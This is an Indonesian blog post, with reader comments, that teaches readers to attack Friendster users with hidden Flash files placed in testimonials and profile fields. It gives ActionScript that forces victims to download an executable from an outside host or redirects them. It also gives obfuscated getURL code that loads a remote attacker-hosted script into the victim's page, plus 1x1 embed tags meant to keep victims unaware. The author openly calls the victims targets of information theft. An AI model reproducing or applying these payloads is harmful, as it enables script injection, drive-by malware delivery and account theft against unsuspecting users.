9.01.2008

Hacking Friendster Melalui Flash Exploit

·

Download artikel di bawah dalam bentuk E-Book agar kalian bisa membacanya dengan serius Di Sini

Untuk mengawali Bulan Suci Ramadhan ini, bagaimana jika kita membahas sedikit tentang Friendster Hacking? Tapi dosa engga yah tyo ini kan Bulan Puasa tyo masa sih mau nyolong punya orang? Ah biarin deh yang penting kan Happy tyo tyo

Akhirnya jika kemarin aku membuat artikel tentang Sejarah Friendster Hacking dan yang lainnya, bisa juga sekarang aku membuat artikel tentang Friendster Hacking, walalupun ini artikel Friendster Hacking yang pertama kali aku buat mungkin bisa berguna untuk semua orang yang iseng atau jail dengan Trik Hacking seperti ini. Bagaimana? apa ingin mencoba Trik Friendster Hacking perdana yang aku buat? He..he..he.. Jika penasaran, langsung saja baca dengan cermat key.


Seperti yang pernah aku katakan pada bagian Sejarah Friendster Hacking sebelumnya. Testimonial adalah tempat dimana celah keamanan pertama bagi Friendster.com.

Apa yang dilakukan oleh para Hacker pada saat itu di bagian testimonial bukanlah suatu hal yang sangat sulit. Hanya dengan bermodalkan suatu Macromedia Flash 8 semua orang bisa melakukan hal yang serupa. Intinya adalah, pembuatan file flash *.swf yang mengandung script GerURL, sehingga memaksa siapapun yang melihat file flash tersebut melakukan GetURL seperti yang diperintahkan.

Hanya dengan mengetikan script, kemudian membuat ukuran flash menjadi 1x1 atau berapapun besarnya yang kita inginkan, kemudian melakukan pembuatan file *.swftersebut menggunakan Macromedia Flash 8, kita dapat melakukan Hacking Friendster.

Script yang bisa dimasukkan pun ternyata bervariasi, tergantung apa yang diinginkan oleh seorang Hacker, untuk dieksekusi oleh para korbannya.

Pada contoh gambar di berikut, script tersebut ditunjukkan untuk membuat seorang korban (mereka yang membuka file *.swf tersebut di Internet), untuk melakukan download file *.exe yang berlokasi di http://www.fansblog.com/test.exe. (Ingat, gambar tersebut hanya sebagai contoh, dan jika kalian membuka alamat tersebut, tentu alamat tersebut tidak ada).


Sedangkan bagi mereka yang ingin melakukan Redirection, script yang diperlukan pun tidak jauh berbeda dengan yang sudah ada pada gambar di atas. Hanya perlu sedikit modifikasi, yaitu dengan menghilangkan nama file di bagian URL sehingga script-nya akan menjadi seperti berikut:

getURL("http://www.contoh.com");


Atau

getURL("http://www.contoh.com", "_parent")


Seluruh pengguna Friendster yang membuka tesimonial yang memiliki flash dengan script seperti ini, akan mengalami redirection ke alamat http://www.contoh.com.

Bagaimana menyaimpannya dalam Testimonial ? Yupz, tentu pertama-tama kita harus melakukan upload file *.swf kita ke dalam sebuah Web Hosting, misalnya nama file kita adalah fshacking.swf, kita perlu menyimpannya di sebuah Website yang memberika layanan Hosting, dan kemudian mengambil URL tersebut dimana kita bisa langsung membuka URL tersebut dan melihat file Flash itu. Sebagai contoh misalnya:
http://www.website-kita.com/fshacking.swf

Setelah file fshacking.swf selesai dibentuk dan di upload dengan benar, yang perlu kita lakukan berikutnya adalah mencoba membuka Friendster kita, dan mengirimkannya sebagai salah satu contoh kepada salah seorang teman kita. Tentunya pengiriman ini harus dilakukan dengan menggunakan Testimonial, mengingat Testimonial adalah cara yang kita bahas dalam artikel kali ini.

Misalnya kita sudah mempunyai URL file *.swf seperti berikut:

http://www.website-kita.com/fshacking.swf

Alamat di atas telah menunjukkan kepada kita, sebuah URL yang mengandung swf file yang telah memiliki script untuk memaksa seorang user men-download file test.exe setelah melihat file swf tersebut. Namun bukan berarti kita akan mengirimkannya begitu saja, yang harus kita lakukan adalah melakukan embed Flash pada saat itu adalah dengan format:

<embed src="http://www.website-kita.com/fshacking.swf" width="1" heigh"1"></embed>


Atau

<object classid='clsid:D27CBD6E-AE6D-11cf-96B8-444553540000' codebase='http://macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0' width='400' height='250'><param name='movie' value='http://www.website-kita.com/fshacking.swf' /><param name='quality' value='high' /><embed src='http://www.website-kita.com/fshacking.swf' quality='high' pluginspage='http://www.macromedia.com/go/gerflashplayer' type='application/x-shockwave-flash; width='400' height='250' allowScriptAcces"never"></embed></object>


Di mana http://www.website-kita.com/fshacking.swf harus diganti menjadi alamat di mana kita meng-upload Flash kita, dan Width serta Height adalah tinggin dan lebar tampilan. Jika kita tidak menyertakan gambar animasi apapun dalam Flash tersebut, butlah itu menjadi 1x1, sehingga kotak Flash putih kosong tidak akan terlihat pada saat terjadi proses menunggu. Namun bukan berarti kita harus menggunakan 1x1 seterusnya, modifikasi apapun bebas kita lakukan sesuai imajinasi masing-masing.

Setelah melakukan embed dan menyimpan Direct URL tempat file di upload, maka kita hanya perlu menekan tombol Submit untuk kemudian membuat testimonial ini terkirim langsung kepada sang korban.

Dan apabila korban melihat testimonial tersebut, tanpa mematikan penggunaan JavaScript pada Browser miliknya, maka ia akan langsung mendapatkan dirinya melakukan download sebuah file bernama test.exe.

BENTUK LAIN FLASH EXPLOIT

Penggunaan Flash memang disebut sebagai teknik pertama dalam melakukan teknik Friendster Hacking, namun bukan berarti teknik ini sudah menjadi legenda (legenda fansblogs kali yah he..he..he..). Berbagai pengembangan, dimulai dari perubahan ekstensi, script untuk melakukan penyisipan file Falsh pada testimonial maupun profile, hingga pengguanaan script pada Falsh itu sendiri menjadikan teknik ini tetap maju hingga saat ini.

Selain dikenal sebagai teknik paling pertama, dan teknik yang paling merepotkan pihak Friendster, serta paling berbahaya, teknik ini juga dikenal sebagai yang paling sulit di-patch oleh pihak Friendster. Bagaimana tidak, di saat puluhan script sudah difillter oleh pihak Friendster pada generasi awal Friendster Hacking, Flash paling pertama dapat bertahan setidaknya 5 bulan lamanya, sampai di-patch oleh pihak Friendster.

Pada artikel kali ini, kita akan kembali membahas mengenai Friendster Hacking menggunakan Falsh yang merupakan pengembangan dari Flash pertama, yaitu dengan cara mengubah script Flash yang ada di dalam file .swf tersebut.

Sebagai permulaan, tentu kita melakukan hal yang selalu kita lakukan, yaitu membuka Macromedia Falsh 8.0 (atau versi berapapun yang kita miliki), dan memilih membuka dokumen baru yang bernama Falsh Document.


Tampilannya akan terlihat seperti gambar berikut dan jangan sampai salah pilih. Pilihlah menu yang diberi kotak warna merah.


Setelah itu, lakukanlah klik kanan pada bagian layer dan pilih menu Document and Properties.

Yang kira-kira tampilannya seperti gambar berikut:


Setelah itu akan muncul kotak dengan tampilan seperti berikut:


Pada bagian ini, yang perlu kita lakukan adalah mengubah Dimensoins yang ada pada kotak tersebut yang aku beri kotak berwarna merah.

Yang kita lakukan adalah, merubah Dimensions Width dan Height yang semula Width 550 px dan Height 400 px menjadi Width 1 px dan Height 1 px sehingga akan menjadi seperi gambar berikut:


Hal ini akan mempengaruhi besarnya kotak putih yang nampak pada bagian Testimonial kita. Mengisinya dengan lebar 1 dan panjang 1 akan membuat orang tidak menyadari bahwa ada Flash yang tersisip dalam testimonial yang mereka terima pada profile mereka.

Setelah selelsai dilakukan pengaturan sesuai dengan yang kita inginkan (disarankan hanya melakukan pada lebar dan panjang dimensi saja), kliklah pada tombol OK untuk mengaplikasikan perubahan yang kita lakukan pada dimensi layer tersebut.

Jika kita melakukan pengaturan panjang dan lebar sebesar 1x1, maka kita tidak akan melihat adanya kotak lembar putih lagi pada bagian pengaturan layer tersebut, malinkan hanya sebuah titk putih.

Sesudah selesai dengan pengaturan layer, yang perlu kita lakukan saat ini adalah melakukan penambahan dua buah KeyFrame pada Flash tersebut. KeyFrame sendiri bisa dikatakan lembaran penting, dimana script kita akan dijalankan.

ANALOGI RINGAN

Tentu kita tahu bagaiman sebuah animasi dibuat, khususnya animasi yang dijadikan film kartun. Para pembuat kartun menyusun ribuan gambar yang bersambungan, yang membuat seolah-olah gambar tersebut bergerak, apabila kertasnya digerakan dengan sangat cepat. Lembaran inilah yang kita sebut sebagai Frame dalam berbagai alat pembuat animasi seperti Flash. Sedangkan Keyframe itu sendiri berarti, lembaran yang mengandung suatu hal yang lebih penting dibandingkan yang lain, dalam kasus ini adalah script yang akan dijalankan untuk mencuri informasi dari pihak korban.

Kenapa dua buah KeyFrame ? Kenapa tidak dua buah DADA tyo Kita membuat dua buah KeyFrame pada file penjebak kita ini, dikarenakan kita memerlukan sebuah Frame dimana kita akan memulai penjalanan script tersebut, dan kemudian menhentikannya. Berikut adalah cara kita menambahkan KeyFrame pada program Macromedia Flash.


Pada dasarnya kita hanya melakukan klik kanan pada salah satu kotak yang ada pada bagian Macromedia Flash, dan kemudian memiliki Insert KeyFrame. Tempatnya tentu tidaklah penting, kita bisa membuat KeyFrame tersebut di manapun, namun apabila terlalu ke belakang, akan memakan waktu cukup lama bagi Flash untuk melakukan penjalanan script tersebut, dan bisa saja jika terlalu lama, seorang korban sudah melakukan perpindahan halaman, yang juga berarti kita tidak dapat medapatkan informasi dari mereka.

Ingat! kita memerlukan dua buah KeyFrame, oleh karena itu kita akan membuatnya. Perlu juga diingat bahwa sebuah gambar titik kehitaman akan muncul pada kotak kecil pengaturan layer tersebut jika penambahan KeyFrame berhasil dilakukan.


Setelah menyelesaikan penambahan KeyFrame, yang harus kita lakukan selanjutnya adalah mengisikan script pada bagian pengaturan Action untuk Frame tersebut.

Gambar tersebut menjelaskan bahwa kita harus menuliskan script:

Stop();


Script ini kita tuliskan pada kotak pengaturan Actions pada KeyFrame ke-2 kita. Hal ini akan mengakibatkan eksekusi atau perjalanan script yang akan dilakukan pada Frame ke-5 dan berhenti pada Frame ke-9 tersebut.

Sedangkan yang harus kita tuliskan sebagai script pencuri informasinya adalah script berikut gambar:


Gambar di atas menunjukkan kita harus menuliskan script berikut:

aX = "get";
bX = "URL";
cX = "javacsript:";
dX = "var tF=document.createElement(’’script’’);tF.type=’’text/javascript’’;tF.src=’’URL-JavaScript-Kita’’;document.getElementsByTagName(’’head’’)[0].appenChild(tF);void(0);";
eval(aX + bX)(Cx + dX);


Dimana URL-JavaScript-Kita harus kita ganti dengan alamat tempat kita menyimpan JavaScript milik kita, misalnya http://www.website-kita.com/file.js

Kita akan menyimpan script file di atas, tepat pada Frame ke-5 yang sudah kita sediakan, tentunya dengan cara klik kiri Frame ke-5 yang sudah memiliki lambang bulatan hitam, dan mengisikan script tersebut pada bagian kolom pengaturan Actions.

Setelah kita menyelesaikan semua ini, yang harus kita lakukan adalah melakukan klik pada tombol File yang ada pada bagian kiri atas tampilan program Macromedia Flash 8.0, dan melakukan pemilihan pada menu Save As yang kemudian file ini dapat kita simpan dengan menggunakan nama apapun sesuai dengan keinginan kita.



Sebenarnya ini bukanlah file yang akan kita gunakan sebagai file pencuri informasi, namun ini adalah salah satu prosedur untuk melakukan backup data, sehingga jika hasilnya tidak bekerja, kita tidak perlu melakukan semuanya lagi dari awal, namun hanya melakukan pengubahan pada file *.fla tersebut.

Setelah tersimpan dengan nama tersebut, yang harus kita lakukan adalah melakukan pengaturan untuk publikasi file animasi ini, yaitu dengan melakukan klik pada tombol File yang ada pada bagian kiri atas program dan memilih pilihan Publish Setting.

Seperti gambar berikut:


Pada bagian pengaturan publikasi ini, biasanya sebagai hasilnya akan memunculkan dua buah file, yaitu Nama_File.swf dan Nama_File.html (menurut pengaturan standar dari Macromedia Flash). Namun kita bisa mempermudah pekerjaan kita dan agar tidak bingung pada saat melakukan upload file, dengan cara melakukan pemilihan bagi program Macromedia Flash untuk tidak melakukan publikasi hasil file HTML.

Yang harus kita lakukan sangatlah mudah, tentu saja kita harus menghapus tanda cek yang ada pada bagian publikasi file HTML, dan hanya menyisakan untuk menghasilkan file SWF saja pada kolom pengaturannya.

Lihatlah pada gambar berkut:


Dan lihat gambar berikut:


Setelah kita melakukan penghapusan gambar cek tersebut pada pilihan HTML dan hanya menyisakan SWF, yang harus kita lakukan adalah melakukan klik pada tombol OK.

Harus diingat bahwa hasil apapun yang kita inginkan keluar sebagai hasil daripada pembuatan file pencuri ini tidak tertuju pada file SWF, kenyataan bahwa gambar dan ekstensi *.mov juga sering digunakan sebagai alat bantu melakukan Friendster Hacking, membuka kemungkinan lebih untuk kita pembaca sekalian untuk melakukan percobaan.

Penggunaan SWF ini adalah contoh dan bukan sebuah harga mutlak yang harus kita ikuti 100%, namun bagi para pemula, ada baiknya mengikuti petunjuk Step by Step ini dengan sesama.

Setelah kita melakukan klik pada tombol OK yang ada pada bagian kanan bawah dan berada di bagian tengah di antara tiga tombol, maka tindakan akhir daripada pembuatan file pencuri informasi ini adalah melakukan publikasi. Tidak susah, yang harus kita lakukan hanyalah melakukan klik pada tombol File di bagian kiri atas dan memilih menu Publish.

Berikut adalah gambaran yang akan terjadi di saat kita memilih menu Publish.


Setelah selesai dengan segala sesuatu yang sehubungan dengan pembuatan file *.swf ini, kita pasti sekarang sudah memiliki sebuah file swf sebagai hasilnya, apapun itu nama filenya. Pada kesempatan kali ini, aku juga akan memperlihatkan bagaimana kita bisa melakukan penyerangan dengan menggunakan hal ini, dan menunjukkan langsung bagaiman seorang korban terkena serangan.

Sebelumnya sangat baik, jika kita menyetujui beberapa hal, yaitu sebagai contoh, kita akan menggunakan nama-nama berikut sebagai URL dan nama file kita:

1. http://www.web-hosting-kita.com/fshacks.js = URL JavaScript kita

2. http://www.web-hosting-kita.com/test.swf = URL File SWF kita

Nama file yang telah kita buat adalah test.swf.

Tadi kita sudah melakukan pembuatan file Flash yang mana akan menjalankan perintah http://www.web-hosting-kita.com/fshacks.js Oleh karena itu, hal ini tidak perlu dipikirkan lagi. Namun apa yang akan kita simpan pada fshacks.js tersebut?

Sebagai contoh, kita akan menggunakan hal yang mudah terlebih dahulu, yaitu script

<script>alert(’Hello’);</script>


Script tersebut hanya akan membuka sebuah kolom peringatan pada layar Browser kita dengan pesan bertuliskan Hello, dan terdapat sebuah tombol OK di bawahnya. Memang tidak begitu penting kelihatannya, namun kita bisa saja memodifikasi file Java tersebut dengan script lain.

Setelah kita membuat file tersebut, lalumeng-upload-nya dan kemudian menyimpan script yang ada di dalam file swf kita, maka kita harus melakukan penyisipan file swf tersebut ke dalam profile kita. Kenapa tidak Testimonial? Sekarang ini bagian Testimonial penjagaannya agak ketat, sehingga yang paling mudah adalah melalui profile kita. Eits! bukan berarti dengan Testimonial tidak bisa dilakukan
Anggap kita sudah melakukan upload file swf kita, dan URL-nya adalah http://www.web-hosting-kita.com/test.swf, maka yang sekarang harus kita lakukan adalah mempersiapkan script berikut untuk memasukkan Flash ke dalam profile kita:

<embed src='http://www.web-hosting-kita.com/test.swfâ' width=0 height=0 allowScriptAccess='alwaysâ'/>


Setelah persiapan selesai, lakukan login ke dalam account kita dan masukanlah ke bagian pengaturan profile di mana saja kita inginkan.

Kita bisa memasukkan script tersebut pada beberapa tempat yang diantaranya adalah:

Schools (Other)

Affiliations

Hobbies and Interests

Favorite Books

Favorite Movies

Favorite Music

Favorite TV Shows


Setelah itu lakukanlah penyimpanan terhadap perubahan yang telah kita lakukan dengan menekan tombol Save yang ada pada bagian kiri bawah pada halaman tersebut. Tunggu beberapa saat, dan setelah loading selesai, artinya script kita sudah siap untuk menjalankan tugasnya.

Untuk mengetahui apakah script dan Flash yang telah kita buat tersebut bekerja dengan benar, kita harus perlakukan percobaan. Percobaan ini bisa kita lakukan dengan membuka halaman profile kita sendiri.

Munculnya tampilan kotak pesan dengan tulisan Hello berarti bukti bahwa file swf kita telah menjalankan script yang ada pada http://www.web-hosting-kita.com/fshacks.js dengan benar, sekaligus membuktikan bahwa penyisipan Flash telah berhasil.

Pengembangan Flash sebagai alat bantu yang paling banyak manfaatnya dalam melakukan tindak Friendster Hacking tidak hanya sampai di sini, beragam aksi lainnya yang tidak kalah mengerikan juga dapat kita lakukan. Seperti contohnya, melakukan pencurian Password hanya dengan bermodalkan Cookies tapi sayangnya proses ini masih sedang dalam proses untuk aku selesaikan. Jadi jika nanti sudah selesai, pasti aku akan segera membuatkan artikelnya, tunggu saja yah.

Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman Ini

Masukkan Email Kalian Untuk Mendapatkan Artikel-Artikel Seperti Di Atas:

Delivered by FeedBurner

6 comments:

Anonymous said...
September 17, 2008 at 3:48 AM  

KaGaK Bisa EuuuuY,,




PreView DuuuNd kLo biSa.........

Gokil said...
September 30, 2008 at 6:26 PM  

klo mau ngopy layoutnya orang tu gmna?...

fansblogs said...
October 1, 2008 at 8:48 AM  

==> Gokil, coba aja liat di SOURCE CODE lewat Mozilla Firefox trus cari bagian Layout code nya.

Anonymous said...
October 23, 2008 at 10:13 AM  

aduh... perusak bangsa nich... km bisa di tangkap lho...
mencuri karya orang lain... jiplakan dari Friendster Hacking ciptaan ThoR aj bangga...

Arif.Ust said...
January 21, 2009 at 7:27 PM  

Artikelnya bagus kata-katanya juga menarik mudah di cerna Trims ya infonya saya tunggu artikel selanjutnya, O..iya Teman saya lagi ikut lomba Speedy Blogging Competition 2008, dimana criteria penilaiannya blog adalah harus banyak pengunjung, posting dan komentar. Boleh saya minta komentar dari teman untuk artikel di blog saya? Kalau Boleh Kunjungi blog saya, hari ini saya sudah posting artikel tolong komentarnya ya dan kalau bisa komentarnya harus berkaitan dengan artikel yang di pilih teman. Ini alamatnya blog saya : http://regedit.blog.telkomspeedy.com/
terima kasih banyak.

Anonymous said...
January 29, 2009 at 3:45 PM  

ini copy-paste bukunya Bung Th0R...
cpd..